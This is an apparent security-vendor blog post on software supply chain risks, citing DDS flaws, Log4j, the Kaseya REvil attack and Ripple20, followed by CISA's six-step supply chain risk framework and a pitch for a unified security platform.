Improving Software Supply Chain Security
Consider these key attack vectors:
Data distribution services (DDS)
DDS is a machine-to-machine technology used for publish-subscribe middleware applications in real-time and embedded systems. Maintained by the Object Management Group (OMG), DDS plays a critical role in implementing reliable communication layers between sensors, controllers, and actuators. It is located at the beginning of the chain, making it easy to lose sight of. and therefore, an attractive target for malicious actors.
In January 2022, Trend Micro Research, TXOne Networks, and ZDI in collaboration with ADLINK Labs and Alias Robotics published an entry that included information on 13 new vulnerabilities for the six most common types of DDS implementations. They found that these new bugs could affect more than just DDS itself.
DDS vulnerabilities can be divided into those affecting the network layer or configuration level. The former can be exploited to implement malicious techniques like denial-of-service (DOS) attacks, spoofing, and automated collection. Configuration-level vulnerabilities can be used to target DDS system developers and integrators.
Open source code
Mostly commonly, developers copy open source code from shared public libraries like Github to get everyday components. Why waste valuable time writing code to take a message from one field to another when someone else has already done it? The ease of use is why 90% of modern applications leverage open source code.
However, the unchecked nature of open source code can lead to crippling attacks like Apache Log4j, a widely used open source logging library. A critical flaw in the Log4j logging framework allowed cybercriminals to compromise vulnerable systems with just a single malicious code injection. It is estimated that Log4j impacted upwards of three billion medical devices that used Java, according to the FDA.
System management tools
Version control systems manage the actual release and deployment processes. Once in production, third-party and open-source production environments host the application. While the system is running, automated operations tools handle the routine business of maintaining service levels, starting and stopping scheduled activities, and synchronizing updates. A suite of systems management tools makes sure that production runs smoothly and resources are optimized.
Kaseya VSA, a popular tech management software, was hit with a REvil ransomware attack in early 2021. The attackers exploited a vulnerability in the update mechanism, enabling them to distribute a malicious payload through the hosts managed by the software. The damage from the widespread attack extended well beyond the virtual world, with a Swedish supermarket chain Coop forced to close 800 stores for almost a week.
Purchased applications
Developers also use purchased software products for things like updating a database, templating a web page, testing, and so on. These software products can be exploited by vulnerabilities, such as Ripple20, a series of zero-day vulnerabilities in a widely used low-level TCP/IP software library developed by Treck, Inc.
The impact of Ripple 20 was magnified by the supply chain; demonstrating how a single vulnerable component can ripple outward to affect a wide range of industries, applications, and companies including Fortune 500 multinational corporations. JSOF reported that the dissemination of the software library led to hundreds of millions of devices being impacted.
Improving software supply chain security
Evidently, the software supply chain can be exploited at multiple points, which makes securing it increasingly complex. To help organizations strengthen defenses, CISA published ICT SCRM Essentials, recommending 6 key steps to building an effective software supply chain security management practice:
- Identify: Determine who needs to be involved
- Manage: Develop your supply chain security policies and procedures based on industry standards and best practices, such as those published by NIST
- Assess: Understand your hardware, software, and services that you procure
- Know: Map your supply chain to better understand what component you procure
- Verify: Determine how your organization will assess the security culture of suppliers
- Evaluate: Establish timeframes and systems for checking supply chain practices against guidelines
To optimize CISA’s framework, ensure your current security tools and vendors don’t slow or create additional barriers across each step. For example, you’ll need comprehensive visibility to not only discover and record all aspects of your digital attack surface, track updates and patches, and learn traffic patterns, but to also map all vendors or third parties who access your data and assets. This high level of visibility is necessary for any specific mitigation tactics, especially in today’s widening digital attack surface.
Look for a vendor with a unified cybersecurity platform that supports broad third-party integrations, ensuring total oversight from a single dashboard across the software supply chain. Security capabilities such as automation, continuous monitoring, and deep data collection and correlation are also vital to enabling faster detection, response, and remediation of affected supply chain components.
For more information about managing and mitigating cyber risk like software supply chain security, check out the following resources:
Read More HERE